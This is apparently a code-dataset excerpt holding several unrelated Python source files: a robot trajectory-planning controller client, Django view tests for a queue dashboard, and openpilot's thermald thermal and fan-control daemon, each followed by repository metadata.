        :param taskheartbeattimeout: seconds until reinitializing the task's zmq server if no heartbeat is received, e.g. 7
        :param scenepk: pk of the scene, e.g. komatsu_ntc.mujin.dae
        :param robotname: name of the robot, e.g. VP-5243I
        :param robotspeed: speed of the robot, e.g. 0.4
        :param regionname: name of the bin, e.g. container1
        :param targetname: name of the target, e.g. plasticnut-center
        :param toolname: name of the manipulator, e.g. 2BaseZ
        :param envclearance: environment clearance in millimeter, e.g. 20
        :param usewebapi: whether to use webapi for controller commands
        :param robotaccelmult: optional multiplier for forcing the acceleration
        """
        super(RealtimeITLPlanningControllerClient, self).__init__(tasktype='realtimeitlplanning', **kwargs)

    def SetJointValues(self, jointvalues, robotname=None, timeout=10, usewebapi=True, **kwargs):
        """Set the planning-side robot joint values."""
        taskparameters = dict({
            'command': 'SetJointValues',
            'jointvalues': jointvalues,
        }, **kwargs)
        return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)

    def GetITLState(self, robotname=None, timeout=10, usewebapi=True, fireandforget=False, **kwargs):
        """Query the current ITL (instruction list) execution state."""
        taskparameters = dict({'command': 'GetITLState'}, **kwargs)
        return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)

    def MoveToCommand(self, program, commandindex=0, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
        """Move the robot to the configuration of one command of *program*."""
        taskparameters = {
            'command': 'MoveToCommand',
            'program': program,
            'commandindex': commandindex,
            'envclearance': envclearance,
        }
        # optional overrides are only sent when explicitly given
        for name, value in (('robotspeed', robotspeed), ('robotaccelmult', robotaccelmult)):
            if value is not None:
                taskparameters[name] = value
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def ExecuteTrajectory(self, identifier, trajectories, statevalues=None, stepping=False, istep=None, cycles=1, restorevalues=None, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
        """Execute pre-computed trajectories on the planning side."""
        taskparameters = {
            'command': 'ExecuteTrajectory',
            'identifier': identifier,
            'trajectories': trajectories,
            'statevalues': statevalues,
            'stepping': stepping,
            'envclearance': envclearance,
            'cycles': cycles,
        }
        # optional fields are only sent when explicitly given
        for name, value in (('istep', istep), ('restorevalues', restorevalues), ('robotspeed', robotspeed), ('robotaccelmult', robotaccelmult)):
            if value is not None:
                taskparameters[name] = value
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def ExecuteTrajectoryStep(self, reverse=False, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
        """Step the currently loaded trajectory once, forward or backward."""
        taskparameters = {
            'command': 'ExecuteTrajectoryStep',
            'reverse': reverse,
        }
        for name, value in (('robotspeed', robotspeed), ('robotaccelmult', robotaccelmult)):
            if value is not None:
                taskparameters[name] = value
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def CancelExecuteTrajectoryStep(self, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
        """Cancel an in-progress trajectory step."""
        taskparameters = {'command': 'CancelExecuteTrajectoryStep'}
        for name, value in (('robotspeed', robotspeed), ('robotaccelmult', robotaccelmult)):
            if value is not None:
                taskparameters[name] = value
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def SetPauseExecuteTrajectory(self, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
        """Pause the currently executing trajectory."""
        taskparameters = {'command': 'SetPauseExecuteTrajectory'}
        for name, value in (('robotspeed', robotspeed), ('robotaccelmult', robotaccelmult)):
            if value is not None:
                taskparameters[name] = value
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def ResumeExecuteTrajectory(self, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
        """Resume a previously paused trajectory."""
        taskparameters = {'command': 'ResumeExecuteTrajectory'}
        for name, value in (('robotspeed', robotspeed), ('robotaccelmult', robotaccelmult)):
            if value is not None:
                taskparameters[name] = value
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def ComputeRobotConfigsForCommandVisualization(self, program, commandindex=0, usewebapi=True, timeout=2, fireandforget=False, **kwargs):
        """Compute the robot configurations used to visualize one program command."""
        taskparameters = dict({
            'command': 'ComputeRobotConfigsForCommandVisualization',
            'program': program,
            'commandindex': commandindex,
        }, **kwargs)
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def ComputeRobotJointValuesForCommandVisualization(self, program, commandindex=0, usewebapi=True, timeout=2, fireandforget=False, **kwargs):
        """Compute the robot joint values used to visualize one program command."""
        taskparameters = dict({
            'command': 'ComputeRobotJointValuesForCommandVisualization',
            'program': program,
            'commandindex': commandindex,
        }, **kwargs)
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)

    def PlotProgramWaypoints(self, usewebapi=False, timeout=1, fireandforget=True, **kwargs):
        """Ask the planner to plot the program's waypoints."""
        taskparameters = dict({
            'command': 'PlotProgramWaypoints',
        }, **kwargs)
        return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
| 53.594406 | 238 | 0.705506 |
bd9f8e1eb82fad69d71aa10f6ec871428fd3a70c | 5,919 | py | Python | wildcard/dashboards/project/queues/tests.py | kickstandproject/wildcard | 0ef2a15d8ac6b1d37db964d0baa7e40f9f771bc9 | [
"Apache-2.0"
] | 2 | 2015-03-04T18:55:24.000Z | 2021-04-20T23:27:19.000Z | wildcard/dashboards/project/queues/tests.py | kickstandproject/wildcard | 0ef2a15d8ac6b1d37db964d0baa7e40f9f771bc9 | [
"Apache-2.0"
] | null | null | null | wildcard/dashboards/project/queues/tests.py | kickstandproject/wildcard | 0ef2a15d8ac6b1d37db964d0baa7e40f9f771bc9 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse # noqa
from django import http
from mox import IsA # noqa
from wildcard import api
from wildcard.test import helpers as test
# View URLs resolved once at import time; UPDATE_URL targets the queue
# with pk 1, matching the fixture queues used in the tests below.
INDEX_URL = reverse('horizon:project:queues:index')
CREATE_URL = reverse('horizon:project:queues:create')
UPDATE_URL = reverse('horizon:project:queues:update', args=[1])
class QueueTests(test.TestCase):
    """View tests for the project-level queues panel.

    Each test records the expected api.payload calls with mox, replays
    them, drives the view through the Django test client, and relies on
    the recorded expectations to verify the backend interaction.
    """

    @test.create_stubs({api.payload: ('queue_list',)})
    def test_index(self):
        # The index view must render the queues table from queue_list().
        api.payload.queue_list(
            IsA(http.HttpRequest)
        ).AndReturn(self.queues.list())
        self.mox.ReplayAll()

        res = self.client.get(INDEX_URL)

        self.assertTemplateUsed(res, 'project/queues/index.html')
        queues = res.context['queues_table'].data
        self.assertItemsEqual(queues, self.queues.list())

    def _test_create_successful(self, queue, create_args, post_data):
        # Shared helper: expect queue_create(**create_args), POST the create
        # form, and assert a clean successful submission.
        api.payload.queue_create(
            IsA(http.HttpRequest),
            **create_args
        ).AndReturn(queue)
        self.mox.ReplayAll()
        post_data['method'] = 'CreateQueueForm'

        res = self.client.post(CREATE_URL, post_data)

        self.assertNoFormErrors(res)
        self.assertMessageCount(success=1)

    def _test_update_successful(self, queue, update_args, post_data):
        # Shared helper: the update form first fetches the queue, then
        # submits queue_update(**update_args).
        api.payload.queue_get(
            IsA(http.HttpRequest),
            queue.uuid,
        ).AndReturn(queue)
        api.payload.queue_update(
            IsA(http.HttpRequest),
            queue.uuid,
            **update_args
        ).AndReturn(None)
        self.mox.ReplayAll()
        post_data['method'] = 'UpdateQueueForm'

        res = self.client.post(UPDATE_URL, post_data)

        self.assertNoFormErrors(res)
        self.assertMessageCount(success=1)

    @test.create_stubs({api.payload: ('queue_create',)})
    def test_create(self):
        queue = self.queues.get(uuid='1')
        self._test_create_successful(
            queue,
            {
                'name': queue.name,
                'description': queue.description,
            },
            {
                'name': queue.name,
                'description': queue.description,
            },
        )

    @test.create_stubs({api.payload: ('queue_create',)})
    def test_create_description_is_not_required(self):
        # Omitting 'description' in the POST should pass '' to the API.
        queue = self.queues.get(uuid='1')
        self._test_create_successful(
            queue,
            {
                'name': queue.name,
                'description': '',
            },
            {
                'name': queue.name,
            },
        )

    @test.create_stubs({api.payload: ('queue_get', 'queue_update')})
    def test_update(self):
        queue = self.queues.get(uuid='1')
        self._test_update_successful(
            queue,
            {
                'name': queue.name,
                'description': queue.description,
            },
            {
                'uuid': queue.uuid,
                'name': queue.name,
                'description': queue.description,
            },
        )

    @test.create_stubs({api.payload: ('queue_get', 'queue_update')})
    def test_update_description_not_required(self):
        # As on create, a missing description updates the queue with ''.
        queue = self.queues.get(uuid='1')
        self._test_update_successful(
            queue,
            {
                'name': queue.name,
                'description': '',
            },
            {
                'uuid': queue.uuid,
                'name': queue.name,
            },
        )

    @test.create_stubs({api.payload: ('queue_delete', 'queue_list')})
    def test_delete(self):
        # The table row action deletes by uuid and redirects to the index.
        uuid = '1'
        api.payload.queue_delete(
            IsA(http.HttpRequest),
            uuid,
        )
        api.payload.queue_list(
            IsA(http.HttpRequest),
        ).AndReturn(self.queues.list())
        self.mox.ReplayAll()

        form_data = {'action': 'queues__delete__%s' % uuid}
        res = self.client.post(INDEX_URL, form_data)

        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({api.payload: ('queue_update', 'queue_list')})
    def test_enable_queue(self):
        # Toggling a disabled queue must call queue_update(disabled=False).
        queue = self.queues.get(uuid="1")
        queue.disabled = True

        api.payload.queue_list(
            IsA(http.HttpRequest),
        ).AndReturn(self.queues.list())
        api.payload.queue_update(
            IsA(http.HttpRequest),
            queue.uuid,
            disabled=False
        ).AndReturn(None)
        self.mox.ReplayAll()

        formData = {'action': 'queues__toggle__%s' % queue.uuid}
        res = self.client.post(INDEX_URL, formData)

        self.assertRedirectsNoFollow(res, INDEX_URL)

    @test.create_stubs({api.payload: ('queue_update', 'queue_list')})
    def test_disable_queue(self):
        # Toggling an enabled queue must call queue_update(disabled=True).
        queue = self.queues.get(uuid="1")
        queue.disabled = False

        api.payload.queue_list(
            IsA(http.HttpRequest),
        ).AndReturn(self.queues.list())
        api.payload.queue_update(
            IsA(http.HttpRequest),
            queue.uuid,
            disabled=True
        ).AndReturn(None)
        self.mox.ReplayAll()

        formData = {'action': 'queues__toggle__%s' % queue.uuid}
        res = self.client.post(INDEX_URL, formData)

        self.assertRedirectsNoFollow(res, INDEX_URL)
| 30.353846 | 78 | 0.585065 |
5a6b78dac2bf2c1fd9385940027aa4b8ff721891 | 17,719 | py | Python | selfdrive/thermald/thermald.py | tobylinjs/openpilot | 6c525691e9943cb88096b1d94c1c29cc4b22369f | [
"MIT"
] | 1 | 2020-09-04T00:41:47.000Z | 2020-09-04T00:41:47.000Z | selfdrive/thermald/thermald.py | tobylinjs/openpilot | 6c525691e9943cb88096b1d94c1c29cc4b22369f | [
"MIT"
] | null | null | null | selfdrive/thermald/thermald.py | tobylinjs/openpilot | 6c525691e9943cb88096b1d94c1c29cc4b22369f | [
"MIT"
] | 2 | 2020-11-30T23:10:07.000Z | 2020-12-01T15:53:03.000Z | #!/usr/bin/env python3
import datetime
import os
import time
from collections import namedtuple
import psutil
from smbus2 import SMBus
import cereal.messaging as messaging
from cereal import log
from common.filter_simple import FirstOrderFilter
from common.hardware import EON, HARDWARE, TICI
from common.numpy_fast import clip, interp
from common.params import Params, put_nonblocking
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.loggerd.config import get_available_percent
from selfdrive.pandad import get_expected_signature
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import (PowerMonitoring,
get_battery_capacity,
get_battery_current,
get_battery_status,
get_battery_voltage,
get_usb_present)
from selfdrive.version import get_git_branch, terms_version, training_version
# Per-hardware thermal sensor mapping: each field holds
# (thermal_zone index or tuple of indices, divisor applied to the raw reading).
ThermalConfig = namedtuple('ThermalConfig', ['cpu', 'gpu', 'mem', 'bat', 'ambient'])

# Expected panda firmware signature; compared against the "PandaFirmware"
# param inside the main loop to detect mismatches.
FW_SIGNATURE = get_expected_signature()

ThermalStatus = log.ThermalData.ThermalStatus
NetworkType = log.ThermalData.NetworkType
NetworkStrength = log.ThermalData.NetworkStrength
CURRENT_TAU = 15.   # 15s time constant
CPU_TEMP_TAU = 5.   # 5s time constant
DAYS_NO_CONNECTIVITY_MAX = 7     # do not allow to engage after a week without internet
DAYS_NO_CONNECTIVITY_PROMPT = 4  # send an offroad prompt after 4 days with no internet
DISCONNECT_TIMEOUT = 5.  # wait 5 seconds before going offroad after disconnect so you get an alert

LEON = False  # set True by setup_eon_fan() when LEON hardware is detected
last_eon_fan_val = None  # cache of the last value written, so redundant I2C writes are skipped
def get_thermal_config():
  """Return the ThermalConfig for the detected hardware.

  Each field is (thermal_zone index(es), divisor); unknown hardware gets
  all-None zones so read_tz() yields zeros.
  """
  # (tz, scale)
  if EON:
    return ThermalConfig(cpu=((5, 7, 10, 12), 10), gpu=((16,), 10), mem=(2, 10), bat=(29, 1000), ambient=(25, 1))
  if TICI:
    return ThermalConfig(cpu=((1, 2, 3, 4, 5, 6, 7, 8), 1000), gpu=((48,49), 1000), mem=(15, 1000), bat=(None, 1), ambient=(70, 1000))
  return ThermalConfig(cpu=((None,), 1), gpu=((None,), 1), mem=(None, 1), bat=(None, 1), ambient=(None, 1))
def read_tz(x):
  """Read thermal zone *x*'s temperature from sysfs.

  Returns 0 when *x* is None or the zone file does not exist.
  """
  if x is None:
    return 0

  zone_path = "/sys/devices/virtual/thermal/thermal_zone%d/temp" % x
  try:
    with open(zone_path) as f:
      return int(f.read())
  except FileNotFoundError:
    return 0
def read_thermal(thermal_config):
  """Sample every configured thermal zone into a new 'thermal' message."""
  dat = messaging.new_message('thermal')
  cpu_zones, cpu_scale = thermal_config.cpu
  gpu_zones, gpu_scale = thermal_config.gpu
  dat.thermal.cpu = [read_tz(z) / cpu_scale for z in cpu_zones]
  dat.thermal.gpu = [read_tz(z) / gpu_scale for z in gpu_zones]
  dat.thermal.mem = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
  dat.thermal.ambient = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
  dat.thermal.bat = read_tz(thermal_config.bat[0]) / thermal_config.bat[1]
  return dat
def setup_eon_fan():
  """Probe the EON fan controller on I2C bus 7.

  Initializes the controller at address 0x21; when those writes fail with
  IOError the hardware is assumed to be LEON and the module-global LEON
  flag is set instead.
  """
  global LEON

  os.system("echo 2 > /sys/module/dwc3_msm/parameters/otg_switch")

  bus = SMBus(7, force=True)
  try:
    # init sequence for the 0x21 controller; write order is preserved
    for reg, val in ((0x10, 0xf),    # mask all interrupts
                     (0x03, 0x1),    # set drive current and global interrupt disable
                     (0x02, 0x2),    # needed?
                     (0x04, 0x4)):   # manual override source
      bus.write_byte_data(0x21, reg, val)
  except IOError:
    print("LEON detected")
    LEON = True
  bus.close()
def set_eon_fan(val):
  """Apply fan level *val* (0-3) to whichever EON fan controller is present.

  Skips the I2C traffic entirely when *val* equals the last value written
  (cached in the module global ``last_eon_fan_val``).
  """
  global LEON, last_eon_fan_val

  if last_eon_fan_val is None or last_eon_fan_val != val:
    bus = SMBus(7, force=True)
    if LEON:
      try:
        # controller at 0x3d: map levels 0-3 onto its register encoding
        i = [0x1, 0x3 | 0, 0x3 | 0x08, 0x3 | 0x10][val]
        bus.write_i2c_block_data(0x3d, 0, [i])
      except IOError:
        # tusb320 fallback when the 0x3d controller is absent
        if val == 0:
          bus.write_i2c_block_data(0x67, 0xa, [0])
          #bus.write_i2c_block_data(0x67, 0x45, [1<<2])
        else:
          #bus.write_i2c_block_data(0x67, 0x45, [0])
          bus.write_i2c_block_data(0x67, 0xa, [0x20])
          bus.write_i2c_block_data(0x67, 0x8, [(val - 1) << 6])
    else:
      # non-LEON path: 0x21 controller takes (val*2)+1 with a manual-override
      # toggle around the write
      bus.write_byte_data(0x21, 0x04, 0x2)
      bus.write_byte_data(0x21, 0x03, (val*2)+1)
      bus.write_byte_data(0x21, 0x04, 0x4)
    bus.close()
    last_eon_fan_val = val
# temp thresholds to control fan speed - high hysteresis
# (the trailing 10000 is a sentinel so a match always exists)
_TEMP_THRS_H = [50., 65., 80., 10000]
# temp thresholds to control fan speed - low hysteresis
_TEMP_THRS_L = [42.5, 57.5, 72.5, 10000]
# fan speed options (PWM values, one per threshold bucket)
_FAN_SPEEDS = [0, 16384, 32768, 65535]
# max fan speed only allowed if battery is hot
_BAT_TEMP_THERSHOLD = 45.
def handle_fan_eon(max_cpu_temp, bat_temp, fan_speed, ignition):
  """Hysteresis-based fan control for EON hardware.

  The speed is raised as soon as a high threshold is crossed, but only
  lowered once the temperature falls under the matching low threshold.
  Returns the new PWM value (also written out via set_eon_fan).
  """
  # smallest speed whose threshold still exceeds the current temperature
  raise_to = next(s for s, limit in zip(_FAN_SPEEDS, _TEMP_THRS_H) if limit > max_cpu_temp)
  lower_to = next(s for s, limit in zip(_FAN_SPEEDS, _TEMP_THRS_L) if limit > max_cpu_temp)

  if raise_to > fan_speed:
    # high thresholds demand a faster fan
    fan_speed = raise_to
  elif lower_to < fan_speed:
    # low thresholds permit a slower fan
    fan_speed = lower_to

  # top speed is reserved for a hot battery
  if bat_temp < _BAT_TEMP_THERSHOLD:
    fan_speed = min(fan_speed, _FAN_SPEEDS[-2])

  set_eon_fan(fan_speed // 16384)

  return fan_speed
def handle_fan_uno(max_cpu_temp, bat_temp, fan_speed, ignition):
  """Linear fan control for uno: 0-80% over 40-80C, capped at 30% offroad."""
  target = int(interp(max_cpu_temp, [40.0, 80.0], [0, 80]))
  return target if ignition else min(30, target)
def thermald_thread():
  """Main loop of thermald.

  Repeatedly samples temperatures and system stats, drives the fan,
  publishes 'thermal' messages, manages offroad alerts (time validity,
  update staleness, firmware mismatch, overheating, charging), and
  decides whether openpilot should be running (should_start).  Never
  returns; may shut the device down via PowerMonitoring.
  """
  health_timeout = int(1000 * 2.5 * DT_TRML)  # 2.5x the expected health frequency

  # now loop
  thermal_sock = messaging.pub_sock('thermal')
  health_sock = messaging.sub_sock('health', timeout=health_timeout)
  location_sock = messaging.sub_sock('gpsLocation')

  ignition = False
  fan_speed = 0
  count = 0

  off_ts = None
  started_ts = None
  started_seen = False
  thermal_status = ThermalStatus.green
  thermal_status_prev = ThermalStatus.green
  usb_power = True
  usb_power_prev = True
  current_branch = get_git_branch()

  network_type = NetworkType.none
  network_strength = NetworkStrength.unknown

  current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
  cpu_temp_filter = FirstOrderFilter(0., CPU_TEMP_TAU, DT_TRML)
  health_prev = None
  fw_version_match_prev = True
  current_update_alert = None
  time_valid_prev = True
  should_start_prev = False
  handle_fan = None
  is_uno = False
  has_relay = False

  params = Params()
  pm = PowerMonitoring()
  no_panda_cnt = 0

  thermal_config = get_thermal_config()

  while 1:
    health = messaging.recv_sock(health_sock, wait=True)
    location = messaging.recv_sock(location_sock)
    location = location.gpsLocation if location else None
    msg = read_thermal(thermal_config)

    if health is not None:
      usb_power = health.health.usbPowerMode != log.HealthData.UsbPowerMode.client

      # If we lose connection to the panda, wait 5 seconds before going offroad
      if health.health.hwType == log.HealthData.HwType.unknown:
        no_panda_cnt += 1
        if no_panda_cnt > DISCONNECT_TIMEOUT / DT_TRML:
          if ignition:
            cloudlog.error("Lost panda connection while onroad")
          ignition = False
      else:
        no_panda_cnt = 0
        ignition = health.health.ignitionLine or health.health.ignitionCan

      # Setup fan handler on first connect to panda
      if handle_fan is None and health.health.hwType != log.HealthData.HwType.unknown:
        is_uno = health.health.hwType == log.HealthData.HwType.uno
        has_relay = health.health.hwType in [log.HealthData.HwType.blackPanda, log.HealthData.HwType.uno, log.HealthData.HwType.dos]

        if (not EON) or is_uno:
          cloudlog.info("Setting up UNO fan handler")
          handle_fan = handle_fan_uno
        else:
          cloudlog.info("Setting up EON fan handler")
          setup_eon_fan()
          handle_fan = handle_fan_eon

      # Handle disconnect: tell Params when a previously-seen panda vanishes
      if health_prev is not None:
        if health.health.hwType == log.HealthData.HwType.unknown and \
           health_prev.health.hwType != log.HealthData.HwType.unknown:
          params.panda_disconnect()
      health_prev = health

    # get_network_type is an expensive call. update every 10s
    if (count % int(10. / DT_TRML)) == 0:
      try:
        network_type = HARDWARE.get_network_type()
        network_strength = HARDWARE.get_network_strength(network_type)
      except Exception:
        cloudlog.exception("Error getting network status")

    msg.thermal.freeSpace = get_available_percent(default=100.0) / 100.0
    msg.thermal.memUsedPercent = int(round(psutil.virtual_memory().percent))
    msg.thermal.cpuPerc = int(round(psutil.cpu_percent()))
    msg.thermal.networkType = network_type
    msg.thermal.networkStrength = network_strength
    msg.thermal.batteryPercent = get_battery_capacity()
    msg.thermal.batteryStatus = get_battery_status()
    msg.thermal.batteryCurrent = get_battery_current()
    msg.thermal.batteryVoltage = get_battery_voltage()
    msg.thermal.usbOnline = get_usb_present()

    # Fake battery levels on uno for frame
    if (not EON) or is_uno:
      msg.thermal.batteryPercent = 100
      msg.thermal.batteryStatus = "Charging"
      msg.thermal.bat = 0

    current_filter.update(msg.thermal.batteryCurrent / 1e6)

    # TODO: add car battery voltage check
    max_cpu_temp = cpu_temp_filter.update(max(msg.thermal.cpu))
    max_comp_temp = max(max_cpu_temp, msg.thermal.mem, max(msg.thermal.gpu))
    bat_temp = msg.thermal.bat

    if handle_fan is not None:
      fan_speed = handle_fan(max_cpu_temp, bat_temp, fan_speed, ignition)
      msg.thermal.fanSpeed = fan_speed

    # If device is offroad we want to cool down before going onroad
    # since going onroad increases load and can make temps go over 107
    # We only do this if there is a relay that prevents the car from faulting
    is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
    if max_cpu_temp > 107. or bat_temp >= 63. or (has_relay and is_offroad_for_5_min and max_cpu_temp > 70.0):
      # onroad not allowed
      thermal_status = ThermalStatus.danger
    elif max_comp_temp > 96.0 or bat_temp > 60.:
      # hysteresis between onroad not allowed and engage not allowed
      thermal_status = clip(thermal_status, ThermalStatus.red, ThermalStatus.danger)
    elif max_cpu_temp > 94.0:
      # hysteresis between engage not allowed and uploader not allowed
      thermal_status = clip(thermal_status, ThermalStatus.yellow, ThermalStatus.red)
    elif max_cpu_temp > 80.0:
      # uploader not allowed
      thermal_status = ThermalStatus.yellow
    elif max_cpu_temp > 75.0:
      # hysteresis between uploader not allowed and all good
      thermal_status = clip(thermal_status, ThermalStatus.green, ThermalStatus.yellow)
    else:
      # all good
      thermal_status = ThermalStatus.green

    # **** starting logic ****

    # Check for last update time and display alerts if needed
    now = datetime.datetime.utcnow()

    # show invalid date/time alert
    time_valid = now.year >= 2019
    if time_valid and not time_valid_prev:
      set_offroad_alert("Offroad_InvalidTime", False)
    if not time_valid and time_valid_prev:
      set_offroad_alert("Offroad_InvalidTime", True)
    time_valid_prev = time_valid

    # Show update prompt
    try:
      last_update = datetime.datetime.fromisoformat(params.get("LastUpdateTime", encoding='utf8'))
    except (TypeError, ValueError):
      last_update = now
    dt = now - last_update

    update_failed_count = params.get("UpdateFailedCount")
    update_failed_count = 0 if update_failed_count is None else int(update_failed_count)
    last_update_exception = params.get("LastUpdateException", encoding='utf8')

    if update_failed_count > 15 and last_update_exception is not None:
      if current_branch in ["release2", "dashcam"]:
        extra_text = "Ensure the software is correctly installed"
      else:
        extra_text = last_update_exception

      if current_update_alert != "update" + extra_text:
        current_update_alert = "update" + extra_text
        set_offroad_alert("Offroad_ConnectivityNeeded", False)
        set_offroad_alert("Offroad_ConnectivityNeededPrompt", False)
        set_offroad_alert("Offroad_UpdateFailed", True, extra_text=extra_text)
    elif dt.days > DAYS_NO_CONNECTIVITY_MAX and update_failed_count > 1:
      if current_update_alert != "expired":
        current_update_alert = "expired"
        set_offroad_alert("Offroad_UpdateFailed", False)
        set_offroad_alert("Offroad_ConnectivityNeededPrompt", False)
        set_offroad_alert("Offroad_ConnectivityNeeded", True)
    elif dt.days > DAYS_NO_CONNECTIVITY_PROMPT:
      remaining_time = str(max(DAYS_NO_CONNECTIVITY_MAX - dt.days, 0))
      if current_update_alert != "prompt" + remaining_time:
        current_update_alert = "prompt" + remaining_time
        set_offroad_alert("Offroad_UpdateFailed", False)
        set_offroad_alert("Offroad_ConnectivityNeeded", False)
        set_offroad_alert("Offroad_ConnectivityNeededPrompt", True, extra_text=f"{remaining_time} days.")
    elif current_update_alert is not None:
      current_update_alert = None
      set_offroad_alert("Offroad_UpdateFailed", False)
      set_offroad_alert("Offroad_ConnectivityNeeded", False)
      set_offroad_alert("Offroad_ConnectivityNeededPrompt", False)

    do_uninstall = params.get("DoUninstall") == b"1"
    accepted_terms = params.get("HasAcceptedTerms") == terms_version
    completed_training = params.get("CompletedTrainingVersion") == training_version

    panda_signature = params.get("PandaFirmware")
    fw_version_match = (panda_signature is None) or (panda_signature == FW_SIGNATURE)  # don't show alert if no panda is connected (None)

    should_start = ignition

    # with 2% left, we killall, otherwise the phone will take a long time to boot
    should_start = should_start and msg.thermal.freeSpace > 0.02

    # confirm we have completed training and aren't uninstalling
    should_start = should_start and accepted_terms and completed_training and (not do_uninstall)

    # check for firmware mismatch
    should_start = should_start and fw_version_match

    # check if system time is valid
    should_start = should_start and time_valid

    # don't start while taking snapshot
    if not should_start_prev:
      is_viewing_driver = params.get("IsDriverViewEnabled") == b"1"
      is_taking_snapshot = params.get("IsTakingSnapshot") == b"1"
      should_start = should_start and (not is_taking_snapshot) and (not is_viewing_driver)

    if fw_version_match and not fw_version_match_prev:
      set_offroad_alert("Offroad_PandaFirmwareMismatch", False)
    if not fw_version_match and fw_version_match_prev:
      set_offroad_alert("Offroad_PandaFirmwareMismatch", True)

    # if any CPU gets above 107 or the battery gets above 63, kill all processes
    # controls will warn with CPU above 95 or battery above 60
    if thermal_status >= ThermalStatus.danger:
      should_start = False
      if thermal_status_prev < ThermalStatus.danger:
        set_offroad_alert("Offroad_TemperatureTooHigh", True)
    else:
      if thermal_status_prev >= ThermalStatus.danger:
        set_offroad_alert("Offroad_TemperatureTooHigh", False)

    if should_start:
      if not should_start_prev:
        params.delete("IsOffroad")

      off_ts = None
      if started_ts is None:
        started_ts = sec_since_boot()
        started_seen = True
        os.system('echo performance > /sys/class/devfreq/soc:qcom,cpubw/governor')
    else:
      if should_start_prev or (count == 0):
        put_nonblocking("IsOffroad", "1")

      started_ts = None
      if off_ts is None:
        off_ts = sec_since_boot()
        os.system('echo powersave > /sys/class/devfreq/soc:qcom,cpubw/governor')

    # Offroad power monitoring
    pm.calculate(health)
    msg.thermal.offroadPowerUsage = pm.get_power_used()
    msg.thermal.carBatteryCapacity = max(0, pm.get_car_battery_capacity())

    # Check if we need to disable charging (handled by boardd)
    msg.thermal.chargingDisabled = pm.should_disable_charging(health, off_ts)

    # Check if we need to shut down
    if pm.should_shutdown(health, off_ts, started_seen, LEON):
      cloudlog.info(f"shutting device down, offroad since {off_ts}")
      # TODO: add function for blocking cloudlog instead of sleep
      time.sleep(10)
      os.system('LD_LIBRARY_PATH="" svc power shutdown')

    msg.thermal.chargingError = current_filter.x > 0. and msg.thermal.batteryPercent < 90  # if current is positive, then battery is being discharged
    msg.thermal.started = started_ts is not None
    msg.thermal.startedTs = int(1e9*(started_ts or 0))

    msg.thermal.thermalStatus = thermal_status
    thermal_sock.send(msg.to_bytes())

    if usb_power_prev and not usb_power:
      set_offroad_alert("Offroad_ChargeDisabled", True)
    elif usb_power and not usb_power_prev:
      set_offroad_alert("Offroad_ChargeDisabled", False)

    thermal_status_prev = thermal_status
    usb_power_prev = usb_power
    fw_version_match_prev = fw_version_match
    should_start_prev = should_start

    # report to server once per minute
    if (count % int(60. / DT_TRML)) == 0:
      cloudlog.event("STATUS_PACKET",
                     count=count,
                     health=(health.to_dict() if health else None),
                     location=(location.to_dict() if location else None),
                     thermal=msg.to_dict())

    count += 1
def main():
  """Entry point: run the thermal monitoring loop (never returns)."""
  thermald_thread()
if __name__ == "__main__":
main()
| 38.352814 | 149 | 0.706925 |
e36a45ad1cdcd939f1297508c9bf9d67ed438dd7 | 1,799 | py | Python | python/src/nnabla/backward_function/sink.py | sdonatti/nnabla | ac4a42e62dd358f16bd79c08a9a9f3d83c0100c9 | [
"Apache-2.0"
] | 1 | 2020-08-03T12:49:19.000Z | 2020-08-03T12:49:19.000Z | python/src/nnabla/backward_function/sink.py | sdonatti/nnabla | ac4a42e62dd358f16bd79c08a9a9f3d83c0100c9 | [
"Apache-2.0"
] | 1 | 2020-11-09T07:33:29.000Z | 2020-11-09T07:33:29.000Z | python/src/nnabla/backward_function/sink.py | sdonatti/nnabla | ac4a42e62dd358f16bd79c08a9a9f3d83c0100c9 | [
"Apache-2.0"
